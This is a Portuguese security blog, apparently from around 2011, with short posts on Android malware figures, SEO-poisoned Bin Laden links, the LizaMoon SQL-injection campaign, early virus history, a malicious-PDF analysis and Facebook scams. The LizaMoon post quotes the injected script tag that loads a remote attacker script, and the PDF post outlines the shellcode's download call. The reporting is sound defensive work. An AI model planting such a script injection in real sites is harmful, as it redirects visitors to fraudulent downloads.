Hora Zero

A Juniper Networks, empresa de equipamentos de rede e segurança, divulgou que o número de vírus para o Android aumentou 472% desde julho de 2011. Com isso, o Android torna-se a plataforma de smartphones mais atacada por pragas digitais.

A Juniper atribui o aumento à facilidade com que um criador de vírus pode distribuir um programa malicioso. “Parece que tudo que você precisa é uma conta que de desenvolvedor, que pode ser anônima, mais US$ 25, e você já pode postar seus aplicativos”, afirmou a empresa no relatório, pois diferentemente da Apple, a Google não exige que os softwares no Android sejam verificados e tenham uma assinatura digital.

Um dos problemas apontados é que cada fabricante de telefone tem autonomia se certo aparelho da linha vai receber atualizações do sistema ou não. Um exemplo prático que tive foi quando comprei o Quench com Android 1.5, que a Motorola nunca mais atualizou ele, hoje o telefone esta jogado na gaveta pois mais de 50% dos softwares não rodam nele.

A Juniper observou que a maior parte dos vírus para Android – 55% – são espiões criados para roubar dados dos aparelhos, como contatos, localização. Outro ataque muito comum é o trojan de SMS, que compõe 44% dos ataques. Essas pragas enviam automaticamente torpedos SMS para números “premium”, aumentando a conta do celular e permitindo que os criminosos ganhem dinheiro.

Incoming search terms:

• aplicarivo zero hora para android
• zero hora adroid
• virus para pegar informaçao
• Virus para pegar dados
• virus no android - zero hora
• virus anonymus
• tenex os
• nome de vírus desenvolvido para android
• interceptar sms
• downlond search para motorola quench

Cuidado redrobrado onde você clica, os hackers adoram uma boa história, como o casamento real ou o tsunami no Japão. Depois da declaração do presidente dos Estados Unidos fazer o comunicado sobre a morte do procurado número 1 no planeta já começou na internet vários links para sites com arquivos maliciosos aproveitando que a palavra mais usada nos sistemas de busca é "Osama Bin Laden dead", já no tweeter o termo chegou a mais de 4000 mensagens por segundo.

Com a técnica de Blackhat Search Engine Optimization as buscas por informações da morte do terrorista trazem uma centena de sites, muitos deles com malwares.

Aqui em um forum exclusive para Black Hat SEO um hacker explica o que fazer.

Como isso funciona na vida real?

Um hacker cria um site com um vídeo, só que para ver o vídeo você tem que clicar no botão "Like" do facebook.

Só que o like promove sites como esse abaixo.

Update 1:

Acabei de ver que já tem alguns links aqui do Brasil, veja:

Esse link acima, se clicado, baixa um trojan variante do Win32/TrojanDownloader.Banload.PYR Trojan (Eset Antivirus), ele muda o arquivo hosts da maquina redirecionando os site para um site fraudulento.

Incoming search terms:

• arquivo hosts categorizado bloqueio redes sociais
• cityville e falha na conexão
• o que é isto Win32/TrojanDownloader Banload QWI Troyano
• trojan-downloader win32 banload bezz
• zero hora - facebook

Websense Security Labs e Websense Threatseeker Network identificou hoje uma nova campanha de código malicioso se espalhando pela internet que se chama LizaMoon.

O ataque em massa esta ocorrendo através de SQL injection e adiciona o seguinte código na página do site:

<script src=hxxp://lizamoon.com/ur.php></script>

De acordo com o Google Search, mais de 30 mil URLs estão comprimissadas. Isto inclui inclusive algumas URLs do iTunes, como você pode ver abaixo:

E aqui esta o código injetado em uma das URLs do iTunes:

O jeito que o iTunes trabalha é fazendo download de feeds RSS/XML do publicador e atualizar os podcasts e lista de episódios disponíveis. A websense acredita que esses feeds RSS/XML foram comprometidos com o código malicioso. A boa notícia é que o iTunes codifica as tags do script, então o script não roda no computador do usuário. Excelente trabalho, Apple,  parabéns.

 A URL que é injetada esta indisponível no momento, mas o servidor esta funcionando e rodando, significando que pode haver alguma mudança em breve. Enquanto estava funcionando o script no site somente redirecionava o usuário para um conhecido Antivirus falso: hxxp://defender-uqko.in. Este site também esta indisponível agora., então até o momento não há binarios para analisar.

 O domínio lizamoon.com foi registrado 3 dias atrás com indicios claros de informações falsas.

Incoming search terms:

• lizamoon
• quais os sites mais infectados por virus
• quais os sites mais infectados do mundo
• sites mais infectados
• sites mais infectados do mundo

Alguem tem idéia do que pode vir por ai em 2011? quais serão os novos tipos de vírus que aparecerão? quem ou qual a sua utilidade? cyberwar?

Faz 40 anos que o primeiro vírus de computador aparceu. Eu tenho 43 anos e lembro de alguns da lista, me lembro que o único ví rus que peguei foi o famoso ping pong em um AT no escritório do meu pai. Vou passar alguns vírus famosos que passaram pela história nesses 40 anos, vou dividir em várias partes pois o artigo vai ficar meio longo.

Do Creeper até hoje , vimos o número de “malwares” crescer de 1.300 em 1990 para 50.000 em 2000 e para 200 milhões em 2010. Sendo que antes o virus era uma competição entre programadores, ou brincadeiras, hoje eles visam praticamente lucros e/ou ataques financeiros ou então ataques corporativos/governamentais.

1971 – Creeper

foi lançado "em laboratório" em 1971 por  Bob Thomas, funcionário de uma empresa que trabalhava construção da Arpanet, a rede mãe, precursora da Internet. Ele procurava uma máquina na rede, transferia-se para ela e exibia a mensagem “I’m the creeper, catch me if you can!”. Então, começava o processo de novo, esperando desta forma passar de sistema para sistema. Foi  uma pura “prova de conceito", estabelecendo as raízes do vírus de computador na Internet. O vírus rodava em computadores DEC PDP-10 e em sistemas operacionais TENEX.

1982 – Elk Cloner

Foi o primeiro a sair de uma rede científica, foi escrito por Richard Skrenta, um adolescente de 15 anos, como sendo uma brincadeira, ele infectava o Apple DOS 3.3, e se multiplicava através da cópia do disquete.

Tecnicamente, alguns sites consideram este como sendo o primeiro vírus realmente, pois o Creeper não precisava de um setor de boot ou outro arquivo para se replicar, enquanto o Elk infectava o setor de boot. Ele era um vírus que se propagava através da pirataria de software, vamos ao próximo, que é um caso bem interessante.

1986 – Brain

Criado por dois irmãos paquistaneses em janeiro de 1986, o objetivo do vírus era impedir o uso não autorizado de um software que monitorava batimentos cardíacos para os computadores Appls, mas o código foi portado por um programador para o sistema operacional DOS, tornando-se um vírus. A companhia foi alvo de ações judiciais e foi fechada., foi um dos um dos primeiros vírus conhecidos direcionado para o sistema operacional MS-DOS.

Como curiosidade foi o único vírus que continha nome, telefone e endereço dos seus criadores (Basit e Amjad Farooq Alvi)

1987 – Jerusalem, 13th Friday

O famoso sexta feira 13 foi o nome mais conhecido. A origem do vírus é incerta, indicios de 1991 dizem ser da Itália, somente sabe que ele foi descoberto primeiramente na universidade de Jerusalem, eis porque do nome original. Em 1995, 8 anos depois, foi reportado o último incidente.

O nome de sexta feira 13 é porque ele era ativado justamente em qualquer sexta feira 13 do ano, apagando os arquivos EXE e COM.  O virus não infectava o COMMAND.COM.

Um bug no virus original e algumas variantes fazia ele infectar o mesmo arquivo várias vezes, fazendo com que o espaço em disco estourasse.

1988 – Ping Pong

Este foi o primeiro vírus a surgir com impacto no Brasil, surgiu no tempo do Sistema Operacional MS-DOS/PC-DOS, e se instalava na Interrupção 8 do BIOS do PC, seguindo o tick do relógio do PC, ele pulava de um lado para o outro na janela do Micro. Este vírus também é chamado de Boucing Ball ou Boucing Dot.

Foi criado em Turim, Itália. Foi um dos virus de boot mais famosos até a chegado do stoned.

Incoming search terms:

• qual era o principal objetivo do primeiro vírus desenvolvido
• qual o nome do primeiro vírus do computador e em que ano ele foi criado
• qual o nome do primeiro vírus da história?
• qual o nome do primeiro virus
• vírus setor de boot
• promeiro virus mundo brasil
• primeiro virus pong
• primeiro vírus no brasil
• pc dos
• qual o nome do primeiro vírus e em que ano foi criado

Hoje vou colocar um post que acho interessante a todos, pois ele explica como ocorre o ataque de hackers usando um PDF infectado, muito comum hoje em dia. Conforme um estudo da Symantec 76% de todos os ataques é feito com PDFs infectados.

Esta análise foi feita pelo Application Defense Center da Imperva, então mãos a obra e vamos ver como ele funciona.

Primeiro vamos abrir o arquivo infectado em um aplicativo de texto simples, como o notepad.

Podemos ver que o obejeto 11 tem relação ao objeto 12, que contém javascript. Vemos também que a stream esta filtrada com “ASCIIHexDecode”, outros que podemos achar são “FlateDecode”, "ASCII85Decode", etc, isto faz com que o Antivirus não identifique o código no PDF.

Aqui temos o código depois de decodificado.

Vamos abrir o código em um editor de texto.

confirmamos que é um javascript, vamos ver o que ele faz.

Usando o Malzilla vamos decodificar o javascript.

Pegamos o shellcode, vamos ver ele de perto.

Agora para saber o que faz convertemos ele para EXE.

Abrimos o EXE no IDA, um disassembler

vemos que o código começa com um Nop Sled, vamos identificar algumas strings.

Ok, achamos a URL do ataque e o nome do arquivo que ele baixa, Pdfupd.exe
Ele usa o comando URLDownloadtoFileA

Espero que tenham gostado do artigo, quando der posto mais algumas informações sobre esse tipo de ataque.

Incoming search terms:

• desmontando textos
• desmontando o texto
• codigos para hacker pdf
• desmontado texto
• desmontando texto
• desmontar pdf
• disassembler IDA download br
• hack em pdf

Voces já devem ter usado ou ter visto em alguma página da internet esses scanners online. Quando foi baixar algum arquivo de algum site estranho a pessoa fala que escaneou o arquivo no site e disse que não tem nenhum vírus/trojan/malware.

Fizeram uma lista com os sites de escaners online mais confiáveis.

O bom dos AV online é que eles provem uma boa informação, onde tem o hash de cada arquivo e algum nível de resposta das empresas de segurança.

Nessa lista, os que são verdes, são confiáveis, amarelos são suspeitos mas os pesquisadores não acharam evidências o bastante para classificarem de vermelho e vermelho são não confiáveis.

Incoming search terms:

• scanner virus online arquivo

Relatório anual do PandaLabs, laboratório anti-malware da Panda Security, identificou que cerca de 48% das pequenas e médias empresas, com até mil computadores, foram infectadas por algum tipo de malware em 2010. Dessas, 27% confirmaram que a origem da infecção foi um dispositivo USB conectado ao PC. A pesquisa foi realizada com 10.470 empresas em 20 países.

O levantamento identificou ainda que, no ano passado, 25% dos novos worms foram projetados para se espalharem por meio de USB. Esse tipo de infecção perde para a disseminação por e-mail, mas é uma tendência crescente, de acordo com o relatório.

A ameaça pode ser copiada para qualquer tipo de dispositivo de armazenamento, como celulares, DVDs, HD externos e MP4. “Há muitos dispositivos que podem ser conectados a um computador. Isso é conveniente para o usuário, mas todos têm memória interna ou externa, e com isso pode ser infectado sem o conhecimento dele”, diz Ricardo Bachert, diretor-geral de consumo da Panda Security Brasil.

Outro método, que o relatório comenta, muito usado de infecção é por exploração em mídias socias.

Portanto, cuidado com USB de quem não conhece para colocar na sua máquina de casa e cuidado quem são seus amigos nas redes sociais, tenha certeza que conheça todos, nunca aceite amizade de quem você não conheça.

O Brasil esta em 14o lugar em países com mais computadores infectados. O relatório completo você pode pegar no link acima.

Em um movimento perigoso o facebook anunciou que esta liberando que aplicativos desenvolvidos por terceiros possam pegar os seus dados pessoais, como telefone e endereço.

CUIDADO!

Tudo bem que a aplicação somente terá acesso a esses dados caso o usuário aceite a aplicação, mas a quantidade de pessoas na internet que não tem noções básicas de segurança de internet é muito grande.

A opção de pegar endereço e combinando outros dados que podemos buscas no perfil dos usuários, abre-se mais oportunidades aos ladrões para ataques de engenharia social.

Será que o facebook não esta colocando em risco os mais de 500 milhoes de usuários que eles tem? Não seria melhor que apenas desenvolvedores que sejam aprovados pelo facebook pudessem fazer tão aplicativo?

Como segurança a dica é; REMOVA SEUS DADOS DO FACEBOOK (TELEFONES E ENDEREÇO) – caso o tenham.

Siguam também as dicas que a sophos dá de como manter o seu perfil mais privado.

Incoming search terms:

• aplicação que pega os dados do facebook
• aplicativos no facebook que pega seus dados
• email falsos para pegar endereços
• falsos aplicativos do facebook
• pegando emails do facebook
• pegando o email do usuário facebook

Cuidado!!

Esse final de semana começou a circular um vírus na mesma linha do Koobface.

Você recebe uma mensagem com um link para app.facebook.com/censored. Tipicamente uma aplicação pede para você permitir a aplicação ser adicionada na sua conta mas essa aponta para um arquivo chamado "FacebookPhotos#####.exe".

O virus é identificado pela Sophos como o W32/Palevo-BB.
Parece que o facebook removeu a aplicação enquanto esse post foi escrito mas é bom ficarem espertos quando receberem notificações, pois ataques em redes sociais estão cade vez mais comuns, sempre identifiquem o que esta sendo carregado, quem enviou, na duvida perguntem se foi mesmo a pessoa que enviou e porque, e tenha sempre o seu Antivirus atualizado.

Incoming search terms:

• virus facebook exe
• facebook exe
• virus novo do facebook
• cuidado virus no facebook